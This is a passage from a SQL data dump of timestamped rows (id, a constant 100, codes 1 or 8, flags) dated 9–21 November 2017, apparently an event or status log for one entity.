18:08:00'),(90,100,8,0,0,'2017-11-09 18:09:09'),(91,100,1,0,0,'2017-11-09 18:10:06'),(92,100,8,0,0,'2017-11-09 18:10:26'),(93,100,1,0,1,'2017-11-09 18:32:22'),(94,100,8,0,0,'2017-11-09 18:32:33'),(95,100,1,0,1,'2017-11-09 18:44:35'),(96,100,8,0,0,'2017-11-09 18:44:45'),(97,100,1,0,1,'2017-11-09 19:31:14'),(98,100,8,0,0,'2017-11-09 19:31:31'),(99,100,1,0,1,'2017-11-09 19:42:09'),(100,100,8,0,0,'2017-11-09 19:42:13'),(101,100,1,0,1,'2017-11-09 19:50:40'),(102,100,8,0,0,'2017-11-09 19:51:44'),(103,100,1,0,1,'2017-11-09 20:28:39'),(104,100,8,0,0,'2017-11-09 20:28:48'),(105,100,1,0,1,'2017-11-09 20:36:53'),(106,100,8,0,0,'2017-11-09 20:37:10'),(107,100,1,0,0,'2017-11-09 20:38:26'),(108,100,8,0,0,'2017-11-09 20:38:31'),(109,100,1,0,1,'2017-11-09 21:07:22'),(110,100,8,0,0,'2017-11-09 21:08:23'),(111,100,1,0,1,'2017-11-09 21:27:00'),(112,100,8,0,0,'2017-11-09 21:27:06'),(113,100,1,0,0,'2017-11-09 21:33:13'),(114,100,8,0,0,'2017-11-09 21:33:26'),(115,100,1,0,1,'2017-11-09 21:53:21'),(116,100,8,0,0,'2017-11-09 21:53:29'),(117,100,1,0,1,'2017-11-09 21:55:39'),(118,100,8,0,0,'2017-11-09 21:55:42'),(119,100,1,0,0,'2017-11-09 21:55:48'),(120,100,8,0,0,'2017-11-09 21:55:51'),(121,100,1,0,1,'2017-11-09 22:04:57'),(122,100,8,0,0,'2017-11-09 22:05:44'),(123,100,1,0,1,'2017-11-09 22:20:44'),(124,100,8,0,0,'2017-11-09 22:22:20'),(125,100,1,0,0,'2017-11-09 22:23:27'),(126,100,8,0,0,'2017-11-09 22:23:54'),(127,100,1,0,0,'2017-11-09 22:24:11'),(128,100,8,0,0,'2017-11-09 22:24:13'),(129,100,1,0,0,'2017-11-09 22:25:09'),(130,100,8,0,0,'2017-11-09 22:25:11'),(131,100,1,0,0,'2017-11-09 22:26:01'),(132,100,1,0,0,'2017-11-09 22:26:02'),(133,100,1,0,0,'2017-11-09 22:26:06'),(134,100,8,0,0,'2017-11-09 22:26:10'),(135,100,1,0,1,'2017-11-09 22:37:05'),(136,100,1,0,1,'2017-11-09 22:50:59'),(137,100,1,0,1,'2017-11-09 22:51:26'),(138,100,8,0,0,'2017-11-09 22:51:38'),(139,100,1,0,0,'2017-11-09 22:52:15'),(140,100,8,0,0,'2017-11-09 22:52:17'),(141,100,1,0,1,'2017-11-09 22:55:15'),(142,100,8,0,0,'2017-11-09 22:55:33'),(143,100,1,0,0,'2017-11-09 22:57:20'),(144,100,8,0,0,'2017-11-09 22:57:27'),(145,100,1,0,0,'2017-11-09 22:58:34'),(146,100,1,0,1,'2017-11-09 23:35:54'),(147,100,1,0,1,'2017-11-09 23:42:43'),(148,100,8,0,0,'2017-11-09 23:42:46'),(149,100,1,0,1,'2017-11-10 00:13:40'),(150,100,8,0,0,'2017-11-10 00:14:29'),(151,100,1,0,1,'2017-11-10 06:26:15'),(152,100,8,0,0,'2017-11-10 06:26:23'),(153,100,1,0,1,'2017-11-10 06:32:26'),(154,100,1,0,0,'2017-11-10 06:32:39'),(155,100,8,0,0,'2017-11-10 06:32:42'),(156,100,1,0,1,'2017-11-10 06:53:52'),(157,100,8,0,0,'2017-11-10 06:53:58'),(158,100,1,0,1,'2017-11-10 07:02:21'),(159,100,1,0,0,'2017-11-10 07:02:44'),(160,100,8,0,0,'2017-11-10 07:03:06'),(161,100,1,0,1,'2017-11-10 07:38:47'),(162,100,8,0,0,'2017-11-10 07:38:55'),(163,100,1,0,1,'2017-11-10 09:01:55'),(164,100,8,0,0,'2017-11-10 09:03:04'),(165,100,1,0,0,'2017-11-10 09:07:19'),(166,100,8,0,0,'2017-11-10 09:07:38'),(167,100,1,0,0,'2017-11-10 09:07:43'),(168,100,8,0,0,'2017-11-10 09:07:49'),(169,100,1,0,0,'2017-11-10 09:07:57'),(170,100,1,0,0,'2017-11-10 09:11:42'),(171,100,8,0,0,'2017-11-10 09:11:49'),(172,100,1,0,0,'2017-11-10 09:12:53'),(173,100,8,0,0,'2017-11-10 09:12:57'),(174,100,1,0,0,'2017-11-10 09:13:40'),(175,100,8,0,0,'2017-11-10 09:15:10'),(176,100,1,0,0,'2017-11-10 09:15:56'),(177,100,8,0,0,'2017-11-10 09:16:06'),(178,100,1,0,1,'2017-11-10 09:18:04'),(179,100,1,0,1,'2017-11-10 09:45:48'),(180,100,8,0,0,'2017-11-10 09:45:50'),(181,100,8,0,0,'2017-11-10 10:00:34'),(182,100,1,0,1,'2017-11-10 12:00:57'),(183,100,8,0,0,'2017-11-10 12:01:06'),(184,100,1,0,1,'2017-11-10 12:23:17'),(185,100,8,0,0,'2017-11-10 12:23:21'),(186,100,1,0,1,'2017-11-10 12:23:55'),(187,100,8,0,0,'2017-11-10 12:24:00'),(188,100,1,0,1,'2017-11-10 12:47:57'),(189,100,8,0,0,'2017-11-10 12:48:10'),(190,100,1,0,1,'2017-11-10 13:22:23'),(191,100,8,0,0,'2017-11-10 13:22:26'),(192,100,1,0,1,'2017-11-10 13:22:51'),(193,100,8,0,0,'2017-11-10 13:22:59'),(194,100,1,0,1,'2017-11-10 13:35:07'),(195,100,8,0,0,'2017-11-10 13:35:14'),(196,100,1,0,1,'2017-11-10 13:37:27'),(197,100,8,0,0,'2017-11-10 13:37:29'),(198,100,1,0,1,'2017-11-10 13:54:44'),(199,100,8,0,0,'2017-11-10 13:54:47'),(200,100,1,0,1,'2017-11-10 14:18:58'),(201,100,8,0,0,'2017-11-10 14:19:00'),(202,100,1,0,1,'2017-11-10 15:00:31'),(203,100,8,0,0,'2017-11-10 15:00:46'),(204,100,1,0,1,'2017-11-10 15:37:38'),(205,100,8,0,0,'2017-11-10 15:37:48'),(206,100,1,0,1,'2017-11-10 16:20:32'),(207,100,8,0,0,'2017-11-10 16:20:34'),(208,100,1,0,1,'2017-11-10 16:46:29'),(209,100,8,0,0,'2017-11-10 16:46:30'),(210,100,1,0,1,'2017-11-10 17:48:05'),(211,100,8,0,0,'2017-11-10 17:48:07'),(212,100,1,0,1,'2017-11-10 18:05:20'),(213,100,8,0,0,'2017-11-10 18:05:22'),(214,100,1,0,1,'2017-11-10 18:41:53'),(215,100,8,0,0,'2017-11-10 18:41:54'),(216,100,1,0,1,'2017-11-10 19:18:25'),(217,100,1,0,1,'2017-11-10 20:17:26'),(218,100,8,0,0,'2017-11-10 20:18:07'),(219,100,1,0,1,'2017-11-10 23:24:41'),(220,100,8,0,0,'2017-11-10 23:24:41'),(221,100,1,0,1,'2017-11-10 23:31:18'),(222,100,8,0,0,'2017-11-10 23:31:21'),(223,100,1,0,1,'2017-11-11 00:20:23'),(224,100,8,0,0,'2017-11-11 00:20:25'),(225,100,1,0,1,'2017-11-11 08:06:05'),(226,100,8,0,0,'2017-11-11 08:06:06'),(227,100,1,0,1,'2017-11-11 10:10:23'),(228,100,8,0,0,'2017-11-11 10:10:26'),(229,100,1,0,1,'2017-11-11 10:45:38'),(230,100,8,0,0,'2017-11-11 10:46:06'),(231,100,1,0,1,'2017-11-11 11:00:17'),(232,100,1,0,1,'2017-11-11 11:03:40'),(233,100,1,0,1,'2017-11-11 11:09:35'),(234,100,8,0,0,'2017-11-11 11:09:37'),(235,100,1,0,1,'2017-11-11 13:35:58'),(236,100,8,0,0,'2017-11-11 13:36:07'),(237,100,1,0,1,'2017-11-11 14:53:34'),(238,100,8,0,0,'2017-11-11 14:53:42'),(239,100,1,0,1,'2017-11-11 19:12:00'),(240,100,8,0,0,'2017-11-11 19:12:06'),(241,100,1,0,1,'2017-11-11 19:54:54'),(242,100,8,0,0,'2017-11-11 19:54:56'),(243,100,1,0,1,'2017-11-11 20:07:23'),(244,100,8,0,0,'2017-11-11 20:07:26'),(245,100,1,0,1,'2017-11-11 20:09:09'),(246,100,8,0,0,'2017-11-11 20:09:11'),(247,100,1,0,1,'2017-11-11 20:36:45'),(248,100,1,0,1,'2017-11-11 20:37:26'),(249,100,1,0,1,'2017-11-11 20:38:15'),(250,100,8,0,0,'2017-11-11 20:38:17'),(251,100,8,0,0,'2017-11-11 20:53:28'),(252,100,1,0,1,'2017-11-11 21:12:39'),(253,100,8,0,0,'2017-11-11 21:12:43'),(254,100,1,0,1,'2017-11-11 21:21:51'),(255,100,8,0,0,'2017-11-11 21:21:55'),(256,100,1,0,1,'2017-11-11 21:23:46'),(257,100,8,0,0,'2017-11-11 21:25:34'),(258,100,1,0,1,'2017-11-11 22:11:55'),(259,100,8,0,0,'2017-11-11 22:12:08'),(260,100,1,0,1,'2017-11-11 22:25:43'),(261,100,8,0,0,'2017-11-11 22:26:30'),(262,100,1,0,1,'2017-11-11 23:07:32'),(263,100,1,0,1,'2017-11-11 23:12:33'),(264,100,8,0,0,'2017-11-11 23:12:35'),(265,100,1,0,1,'2017-11-12 01:08:50'),(266,100,1,0,1,'2017-11-12 01:33:57'),(267,100,8,0,0,'2017-11-12 01:34:01'),(268,100,1,0,1,'2017-11-12 02:01:35'),(269,100,8,0,0,'2017-11-12 02:01:36'),(270,100,1,0,1,'2017-11-12 02:41:15'),(271,100,8,0,0,'2017-11-12 02:41:25'),(272,100,1,0,1,'2017-11-12 02:59:02'),(273,100,8,0,0,'2017-11-12 02:59:25'),(274,100,1,0,1,'2017-11-12 06:25:51'),(275,100,8,0,0,'2017-11-12 06:25:52'),(276,100,1,0,1,'2017-11-12 07:29:51'),(277,100,8,0,0,'2017-11-12 07:29:52'),(278,100,1,0,1,'2017-11-12 07:45:51'),(279,100,8,0,0,'2017-11-12 07:45:56'),(280,100,1,0,1,'2017-11-12 08:16:35'),(281,100,8,0,0,'2017-11-12 08:16:42'),(282,100,1,0,1,'2017-11-12 10:00:44'),(283,100,8,0,0,'2017-11-12 10:00:45'),(284,100,1,0,1,'2017-11-12 10:16:01'),(285,100,1,0,1,'2017-11-12 10:16:14'),(286,100,8,0,0,'2017-11-12 10:16:17'),(287,100,1,0,1,'2017-11-12 10:31:33'),(288,100,8,0,0,'2017-11-12 10:31:36'),(289,100,1,0,1,'2017-11-12 10:36:10'),(290,100,8,0,0,'2017-11-12 10:36:12'),(291,100,1,0,1,'2017-11-12 11:56:07'),(292,100,1,0,1,'2017-11-12 12:03:13'),(293,100,1,0,1,'2017-11-12 12:32:52'),(294,100,8,0,0,'2017-11-12 12:33:07'),(295,100,1,0,1,'2017-11-12 13:07:44'),(296,100,8,0,0,'2017-11-12 13:07:49'),(297,100,1,0,1,'2017-11-12 13:56:43'),(298,100,8,0,0,'2017-11-12 13:56:51'),(299,100,1,0,1,'2017-11-12 14:10:49'),(300,100,8,0,0,'2017-11-12 14:10:57'),(301,100,1,0,1,'2017-11-12 14:25:31'),(302,100,8,0,0,'2017-11-12 14:25:38'),(303,100,1,0,1,'2017-11-12 14:55:13'),(304,100,8,0,0,'2017-11-12 14:55:16'),(305,100,1,0,1,'2017-11-12 15:02:45'),(306,100,8,0,0,'2017-11-12 15:02:47'),(307,100,1,0,1,'2017-11-12 15:26:15'),(308,100,8,0,0,'2017-11-12 15:26:19'),(309,100,1,0,1,'2017-11-12 15:28:03'),(310,100,8,0,0,'2017-11-12 15:28:04'),(311,100,1,0,1,'2017-11-12 15:39:05'),(312,100,8,0,0,'2017-11-12 15:39:32'),(313,100,1,0,1,'2017-11-12 16:48:04'),(314,100,8,0,0,'2017-11-12 16:48:13'),(315,100,1,0,1,'2017-11-12 17:33:19'),(316,100,8,0,0,'2017-11-12 17:33:22'),(317,100,1,0,1,'2017-11-12 18:14:08'),(318,100,1,0,1,'2017-11-12 18:37:22'),(319,100,8,0,0,'2017-11-12 18:37:26'),(320,100,1,0,1,'2017-11-12 18:39:06'),(321,100,1,0,1,'2017-11-12 18:39:55'),(322,100,8,0,0,'2017-11-12 18:40:53'),(323,100,8,0,0,'2017-11-12 19:58:52'),(324,100,1,0,1,'2017-11-12 20:05:43'),(325,100,1,0,1,'2017-11-12 20:24:37'),(326,100,8,0,0,'2017-11-12 20:24:39'),(327,100,1,0,1,'2017-11-12 20:51:20'),(328,100,8,0,0,'2017-11-12 20:51:20'),(329,100,1,0,1,'2017-11-12 20:58:32'),(330,100,8,0,0,'2017-11-12 20:58:36'),(331,100,1,0,1,'2017-11-12 21:32:05'),(332,100,8,0,0,'2017-11-12 21:32:07'),(333,100,1,0,1,'2017-11-12 21:40:46'),(334,100,8,0,0,'2017-11-12 21:40:52'),(335,100,1,0,1,'2017-11-12 23:02:50'),(336,100,1,0,1,'2017-11-13 00:15:44'),(337,100,8,0,0,'2017-11-13 00:15:55'),(338,100,1,0,1,'2017-11-13 00:40:38'),(339,100,8,0,0,'2017-11-13 00:41:15'),(340,100,1,0,1,'2017-11-13 03:31:10'),(341,100,1,0,1,'2017-11-13 04:38:07'),(342,100,8,0,0,'2017-11-13 04:38:13'),(343,100,1,0,1,'2017-11-13 06:38:09'),(344,100,8,0,0,'2017-11-13 06:38:14'),(345,100,1,0,1,'2017-11-13 07:28:27'),(346,100,8,0,0,'2017-11-13 07:28:38'),(347,100,1,0,1,'2017-11-13 10:08:27'),(348,100,8,0,0,'2017-11-13 10:09:36'),(349,100,1,0,1,'2017-11-13 10:24:16'),(350,100,8,0,0,'2017-11-13 10:24:18'),(351,100,1,0,1,'2017-11-13 10:50:12'),(352,100,1,0,1,'2017-11-13 11:16:58'),(353,100,1,0,1,'2017-11-13 11:17:38'),(354,100,1,0,1,'2017-11-13 11:33:30'),(355,100,8,0,0,'2017-11-13 11:33:32'),(356,100,1,0,1,'2017-11-13 11:35:20'),(357,100,8,0,0,'2017-11-13 11:42:12'),(358,100,1,0,1,'2017-11-13 11:43:46'),(359,100,1,0,1,'2017-11-13 11:45:58'),(360,100,8,0,0,'2017-11-13 11:46:27'),(361,100,1,0,1,'2017-11-13 12:11:14'),(362,100,8,0,0,'2017-11-13 12:20:42'),(363,100,1,0,1,'2017-11-13 12:32:12'),(364,100,8,0,0,'2017-11-13 12:32:14'),(365,100,1,0,1,'2017-11-13 12:53:28'),(366,100,8,0,0,'2017-11-13 12:53:52'),(367,100,1,0,1,'2017-11-13 12:54:39'),(368,100,8,0,0,'2017-11-13 12:54:44'),(369,100,1,0,1,'2017-11-13 13:03:30'),(370,100,1,0,1,'2017-11-13 13:14:20'),(371,100,8,0,0,'2017-11-13 13:14:37'),(372,100,1,0,1,'2017-11-13 13:25:20'),(373,100,8,0,0,'2017-11-13 13:25:33'),(374,100,1,0,1,'2017-11-13 13:27:49'),(375,100,8,0,0,'2017-11-13 13:28:00'),(376,100,1,0,1,'2017-11-13 13:28:49'),(377,100,8,0,0,'2017-11-13 13:28:51'),(378,100,1,0,1,'2017-11-13 13:30:16'),(379,100,8,0,0,'2017-11-13 13:30:58'),(380,100,1,0,1,'2017-11-13 13:36:06'),(381,100,8,0,0,'2017-11-13 13:36:06'),(382,100,1,0,1,'2017-11-13 13:37:27'),(383,100,8,0,0,'2017-11-13 13:37:36'),(384,100,1,0,1,'2017-11-13 13:38:14'),(385,100,8,0,0,'2017-11-13 13:40:31'),(386,100,8,0,0,'2017-11-13 13:40:36'),(387,100,1,0,1,'2017-11-13 13:42:56'),(388,100,1,0,1,'2017-11-13 13:48:51'),(389,100,1,0,1,'2017-11-13 13:50:04'),(390,100,8,0,0,'2017-11-13 13:50:08'),(391,100,1,0,1,'2017-11-13 13:50:30'),(392,100,8,0,0,'2017-11-13 13:50:32'),(393,100,1,0,1,'2017-11-13 14:00:00'),(394,100,1,0,1,'2017-11-13 14:09:22'),(395,100,1,0,1,'2017-11-13 14:17:23'),(396,100,8,0,0,'2017-11-13 14:17:34'),(397,100,1,0,1,'2017-11-13 15:07:02'),(398,100,8,0,0,'2017-11-13 15:07:16'),(399,100,1,0,1,'2017-11-13 15:11:27'),(400,100,8,0,0,'2017-11-13 15:11:30'),(401,100,1,0,1,'2017-11-13 15:12:47'),(402,100,8,0,0,'2017-11-13 15:12:54'),(403,100,1,0,1,'2017-11-13 15:13:59'),(404,100,8,0,0,'2017-11-13 15:15:08'),(405,100,1,0,1,'2017-11-13 15:27:21'),(406,100,8,0,0,'2017-11-13 15:27:57'),(407,100,1,0,1,'2017-11-13 15:28:44'),(408,100,1,0,1,'2017-11-13 15:46:01'),(409,100,1,0,1,'2017-11-13 15:53:10'),(410,100,8,0,0,'2017-11-13 15:53:41'),(411,100,1,0,1,'2017-11-13 16:09:57'),(412,100,8,0,0,'2017-11-13 16:10:05'),(413,100,1,0,1,'2017-11-13 16:14:49'),(414,100,8,0,0,'2017-11-13 16:15:26'),(415,100,1,0,1,'2017-11-13 16:44:42'),(416,100,8,0,0,'2017-11-13 16:44:56'),(417,100,1,0,1,'2017-11-13 16:51:38'),(418,100,8,0,0,'2017-11-13 16:51:40'),(419,100,1,0,1,'2017-11-13 16:54:23'),(420,100,8,0,0,'2017-11-13 16:57:23'),(421,100,1,0,1,'2017-11-13 17:22:39'),(422,100,8,0,0,'2017-11-13 17:23:56'),(423,100,1,0,1,'2017-11-13 17:35:54'),(424,100,8,0,0,'2017-11-13 17:36:14'),(425,100,1,0,1,'2017-11-13 17:39:33'),(426,100,1,0,1,'2017-11-13 17:55:44'),(427,100,8,0,0,'2017-11-13 17:55:45'),(428,100,8,0,0,'2017-11-13 18:02:40'),(429,100,1,0,1,'2017-11-13 18:08:42'),(430,100,8,0,0,'2017-11-13 18:08:49'),(431,100,1,0,1,'2017-11-13 18:12:29'),(432,100,1,0,1,'2017-11-13 18:28:24'),(433,100,8,0,0,'2017-11-13 18:28:46'),(434,100,1,0,1,'2017-11-13 18:33:48'),(435,100,8,0,0,'2017-11-13 18:33:49'),(436,100,1,0,1,'2017-11-13 18:35:22'),(437,100,8,0,0,'2017-11-13 18:35:41'),(438,100,1,0,1,'2017-11-13 18:41:34'),(439,100,1,0,1,'2017-11-13 18:43:13'),(440,100,8,0,0,'2017-11-13 18:43:18'),(441,100,1,0,1,'2017-11-13 18:59:48'),(442,100,8,0,0,'2017-11-13 19:00:26'),(443,100,1,0,1,'2017-11-13 19:33:31'),(444,100,1,0,1,'2017-11-13 19:36:36'),(445,100,8,0,0,'2017-11-13 19:36:53'),(446,100,1,0,1,'2017-11-13 19:42:34'),(447,100,8,0,0,'2017-11-13 19:42:40'),(448,100,8,0,0,'2017-11-13 19:50:43'),(449,100,1,0,1,'2017-11-13 19:56:09'),(450,100,8,0,0,'2017-11-13 19:56:11'),(451,100,1,0,1,'2017-11-13 20:00:56'),(452,100,8,0,0,'2017-11-13 20:01:09'),(453,100,1,0,1,'2017-11-13 20:07:00'),(454,100,8,0,0,'2017-11-13 20:07:07'),(455,100,1,0,1,'2017-11-13 20:09:50'),(456,100,1,0,1,'2017-11-13 20:27:07'),(457,100,8,0,0,'2017-11-13 20:27:09'),(458,100,1,0,1,'2017-11-13 20:51:50'),(459,100,1,0,1,'2017-11-13 20:52:04'),(460,100,8,0,0,'2017-11-13 20:52:17'),(461,100,8,0,0,'2017-11-13 20:52:42'),(462,100,1,0,1,'2017-11-13 21:01:36'),(463,100,1,0,1,'2017-11-13 21:07:49'),(464,100,8,0,0,'2017-11-13 21:08:16'),(465,100,1,0,1,'2017-11-13 21:19:27'),(466,100,1,0,1,'2017-11-13 21:25:29'),(467,100,1,0,1,'2017-11-13 21:29:52'),(468,100,8,0,0,'2017-11-13 21:30:09'),(469,100,1,0,1,'2017-11-13 21:37:40'),(470,100,8,0,0,'2017-11-13 21:37:44'),(471,100,1,0,1,'2017-11-13 21:39:05'),(472,100,8,0,0,'2017-11-13 21:46:36'),(473,100,1,0,1,'2017-11-13 22:43:54'),(474,100,1,0,1,'2017-11-13 23:13:22'),(475,100,8,0,0,'2017-11-13 23:13:42'),(476,100,1,0,1,'2017-11-13 23:34:46'),(477,100,8,0,0,'2017-11-13 23:34:58'),(478,100,1,0,1,'2017-11-14 00:08:21'),(479,100,1,0,1,'2017-11-14 01:48:32'),(480,100,8,0,0,'2017-11-14 01:48:36'),(481,100,1,0,1,'2017-11-14 02:24:51'),(482,100,1,0,1,'2017-11-14 04:16:29'),(483,100,8,0,0,'2017-11-14 04:16:30'),(484,100,1,0,1,'2017-11-14 06:37:21'),(485,100,8,0,0,'2017-11-14 06:37:29'),(486,100,1,0,1,'2017-11-14 06:40:11'),(487,100,8,0,0,'2017-11-14 06:40:14'),(488,100,1,0,1,'2017-11-14 07:50:47'),(489,100,8,0,0,'2017-11-14 07:50:56'),(490,100,1,0,1,'2017-11-14 07:55:39'),(491,100,8,0,0,'2017-11-14 07:55:44'),(492,100,1,0,1,'2017-11-14 08:27:52'),(493,100,1,0,1,'2017-11-14 08:29:58'),(494,100,8,0,0,'2017-11-14 08:30:04'),(495,100,1,0,1,'2017-11-14 08:37:29'),(496,100,1,0,1,'2017-11-14 10:07:40'),(497,100,8,0,0,'2017-11-14 10:07:42'),(498,100,1,0,1,'2017-11-14 10:18:10'),(499,100,8,0,0,'2017-11-14 10:18:17'),(500,100,1,0,1,'2017-11-14 10:34:05'),(501,100,8,0,0,'2017-11-14 10:34:13'),(502,100,1,0,1,'2017-11-14 10:57:27'),(503,100,8,0,0,'2017-11-14 10:57:43'),(504,100,1,0,1,'2017-11-14 11:11:03'),(505,100,8,0,0,'2017-11-14 11:11:26'),(506,100,1,0,1,'2017-11-14 11:56:52'),(507,100,8,0,0,'2017-11-14 11:57:50'),(508,100,1,0,1,'2017-11-14 12:07:30'),(509,100,8,0,0,'2017-11-14 12:08:01'),(510,100,1,0,1,'2017-11-14 12:40:20'),(511,100,8,0,0,'2017-11-14 12:40:34'),(512,100,1,0,1,'2017-11-14 13:32:25'),(513,100,8,0,0,'2017-11-14 13:34:10'),(514,100,1,0,1,'2017-11-14 14:01:18'),(515,100,8,0,0,'2017-11-14 14:01:35'),(516,100,1,0,1,'2017-11-14 14:28:12'),(517,100,1,0,1,'2017-11-14 16:25:29'),(518,100,1,0,1,'2017-11-14 16:42:51'),(519,100,1,0,1,'2017-11-14 17:15:14'),(520,100,8,0,0,'2017-11-14 17:15:19'),(521,100,1,0,1,'2017-11-14 17:39:46'),(522,100,8,0,0,'2017-11-14 17:40:04'),(523,100,1,0,1,'2017-11-14 17:46:45'),(524,100,8,0,0,'2017-11-14 17:47:05'),(525,100,1,0,1,'2017-11-14 17:50:58'),(526,100,8,0,0,'2017-11-14 17:51:12'),(527,100,1,0,1,'2017-11-14 19:04:58'),(528,100,1,0,1,'2017-11-14 19:45:47'),(529,100,1,0,1,'2017-11-14 21:43:40'),(530,100,1,0,1,'2017-11-14 21:53:00'),(531,100,8,0,0,'2017-11-14 21:53:37'),(532,100,1,0,1,'2017-11-15 08:02:36'),(533,100,8,0,0,'2017-11-15 08:03:05'),(534,100,1,0,1,'2017-11-15 08:29:58'),(535,100,1,0,1,'2017-11-15 09:21:32'),(536,100,1,0,1,'2017-11-15 09:23:14'),(537,100,1,0,1,'2017-11-15 10:04:36'),(538,100,8,0,0,'2017-11-15 10:04:37'),(539,100,1,0,1,'2017-11-15 10:06:40'),(540,100,8,0,0,'2017-11-15 10:07:04'),(541,100,1,0,1,'2017-11-15 10:53:06'),(542,100,8,0,0,'2017-11-15 10:54:22'),(543,100,1,0,1,'2017-11-15 11:09:35'),(544,100,8,0,0,'2017-11-15 11:09:48'),(545,100,1,0,1,'2017-11-15 13:04:33'),(546,100,1,0,1,'2017-11-15 17:21:24'),(547,100,8,0,0,'2017-11-15 17:21:43'),(548,100,1,0,1,'2017-11-15 21:19:32'),(549,100,1,0,1,'2017-11-16 03:12:18'),(550,100,1,0,1,'2017-11-16 03:56:46'),(551,100,1,0,1,'2017-11-16 09:58:49'),(552,100,1,0,1,'2017-11-16 12:10:04'),(553,100,8,0,0,'2017-11-16 12:10:08'),(554,100,8,0,0,'2017-11-16 15:01:12'),(555,100,1,0,1,'2017-11-16 15:01:16'),(556,100,8,0,0,'2017-11-16 19:45:21'),(557,100,1,0,1,'2017-11-16 19:45:41'),(558,100,1,0,1,'2017-11-17 00:37:38'),(559,100,1,0,1,'2017-11-17 07:07:36'),(560,100,1,0,1,'2017-11-17 09:25:51'),(561,100,8,0,0,'2017-11-17 09:26:16'),(562,100,1,0,1,'2017-11-17 09:35:23'),(563,100,1,0,1,'2017-11-17 16:45:08'),(564,100,8,0,0,'2017-11-17 16:45:18'),(565,100,1,0,1,'2017-11-17 23:28:49'),(566,100,1,0,1,'2017-11-18 01:30:48'),(567,100,1,0,1,'2017-11-18 06:57:51'),(568,100,1,0,1,'2017-11-18 07:23:53'),(569,100,8,0,0,'2017-11-18 07:23:57'),(570,100,1,0,1,'2017-11-18 19:49:09'),(571,100,8,0,0,'2017-11-19 00:06:30'),(572,100,1,0,1,'2017-11-19 00:06:30'),(573,100,1,0,1,'2017-11-19 00:36:08'),(574,100,1,0,1,'2017-11-19 00:43:56'),(575,100,8,0,0,'2017-11-19 00:44:05'),(576,100,1,0,1,'2017-11-19 00:59:44'),(577,100,1,0,1,'2017-11-20 04:48:00'),(578,100,1,0,1,'2017-11-20 14:26:21'),(579,100,1,0,1,'2017-11-20 17:10:10'),(580,100,8,0,0,'2017-11-20 17:10:18'),(581,100,1,0,1,'2017-11-20 17:21:55'),(582,100,8,0,0,'2017-11-20 17:22:06'),(583,100,1,0,1,'2017-11-20 17:24:49'),(584,100,8,0,0,'2017-11-20 17:25:03'),(585,100,1,0,1,'2017-11-20 17:33:30'),(586,100,8,0,0,'2017-11-20 17:33:32'),(587,100,1,0,1,'2017-11-20 17:34:10'),(588,100,8,0,0,'2017-11-20 17:34:15'),(589,100,1,0,1,'2017-11-20 18:43:17'),(590,100,8,0,0,'2017-11-20 18:43:18'),(591,100,1,0,1,'2017-11-20 21:33:56'),(592,100,8,0,0,'2017-11-20 21:33:58'),(593,100,1,0,1,'2017-11-20 21:35:37'),(594,100,8,0,0,'2017-11-20 21:35:44'),(595,100,1,0,1,'2017-11-20 21:40:25'),(596,100,1,0,1,'2017-11-20 21:40:32'),(597,100,8,0,0,'2017-11-20 21:40:34'),(598,100,8,0,0,'2017-11-20 21:40:51'),(599,100,1,0,1,'2017-11-20 21:45:07'),(600,100,1,0,1,'2017-11-20 21:58:57'),(601,100,8,0,0,'2017-11-20 21:58:57'),(602,100,1,0,1,'2017-11-20 22:00:04'),(603,100,8,0,0,'2017-11-20 22:00:11'),(604,100,1,0,1,'2017-11-20 22:02:49'),(605,100,8,0,0,'2017-11-20 22:02:51'),(606,100,1,0,1,'2017-11-20 22:04:00'),(607,100,8,0,0,'2017-11-20 22:04:02'),(608,100,1,0,1,'2017-11-20 22:04:21'),(609,100,8,0,0,'2017-11-20 22:04:23'),(610,100,1,0,1,'2017-11-20 22:06:40'),(611,100,8,0,0,'2017-11-20 22:06:43'),(612,100,1,0,1,'2017-11-20 22:11:45'),(613,100,8,0,0,'2017-11-20 22:11:47'),(614,100,1,0,1,'2017-11-20 22:55:58'),(615,100,8,0,0,'2017-11-20 22:56:02'),(616,100,1,0,1,'2017-11-20 23:06:32'),(617,100,8,0,0,'2017-11-20 23:06:34'),(618,100,1,0,1,'2017-11-20 23:41:12'),(619,100,8,0,0,'2017-11-20 23:41:12'),(620,100,1,0,1,'2017-11-20 23:46:23'),(621,100,8,0,0,'2017-11-20 23:46:25'),(622,100,1,0,1,'2017-11-21 00:00:13'),(623,100,8,0,0,'2017-11-21 00:00:24'),(624,100,1,0,1,'2017-11-21 00:03:41'),(625,100,8,0,0,'2017-11-21 00:03:44'),(626,100,1,0,1,'2017-11-21 00:15:22'),(627,100,1,0,1,'2017-11-21 00:18:53'),(628,100,8,0,0,'2017-11-21 00:18:56'),(629,100,8,0,0,'2017-11-21 00:21:03'),(630,100,1,0,1,'2017-11-21 00:24:55'),(631,100,8,0,0,'2017-11-21 00:24:57'),(632,100,1,0,1,'2017-11-21 02:23:10'),(633,100,8,0,0,'2017-11-21 02:23:12'),(634,100,1,0,1,'2017-11-21 03:11:36'),(635,100,1,0,1,'2017-11-21 06:49:18'),(636,100,1,0,1,'2017-11-21 06:53:13'),(637,100,8,0,0,'2017-11-21 06:53:18'),(638,100,1,0,1,'2017-11-21 07:28:18'),(639,100,8,0,0,'2017-11-21 07:28:22'),(640,100,1,0,1,'2017-11-21 07:29:11'),(641,100,8,0,0,'2017-11-21 07:29:15'),(642,100,1,0,1,'2017-11-21 07:42:06'),(643,100,1,0,1,'2017-11-21 07:42:09'),(644,100,8,0,0,'2017-11-21 07:42:16'),(645,100,8,0,0,'2017-11-21 07:42:48'),(646,100,1,0,1,'2017-11-21 07:48:52'),(647,100,8,0,0,'2017-11-21 07:48:57'),(648,100,1,0,1,'2017-11-21 08:47:40'),(649,100,8,0,0,'2017-11-21 08:47:40'),(650,100,1,0,1,'2017-11-21 09:21:19'),(651,100,1,0,1,'2017-11-21 09:59:51'),(652,100,8,0,0,'2017-11-21 10:00:14'),(653,100,1,0,1,'2017-11-21 10:50:36'),(654,100,1,0,1,'2017-11-21 11:00:53'),(655,100,8,0,0,'2017-11-21 11:00:57'),(656,100,1,0,1,'2017-11-21 11:17:16'),(657,100,8,0,0,'2017-11-21 11:17:21'),(658,100,1,0,1,'2017-11-21 11:23:20'),(659,100,1,0,1,'2017-11-21 11:30:30'),(660,100,1,0,1,'2017-11-21 12:08:57'),(661,100,8,0,0,'2017-11-21 12:08:59'),(662,100,1,0,1,'2017-11-21 12:21:13'),(663,100,8,0,0,'2017-11-21 12:21:18'),(664,100,1,0,1,'2017-11-21 12:37:22'),(665,100,8,0,0,'2017-11-21 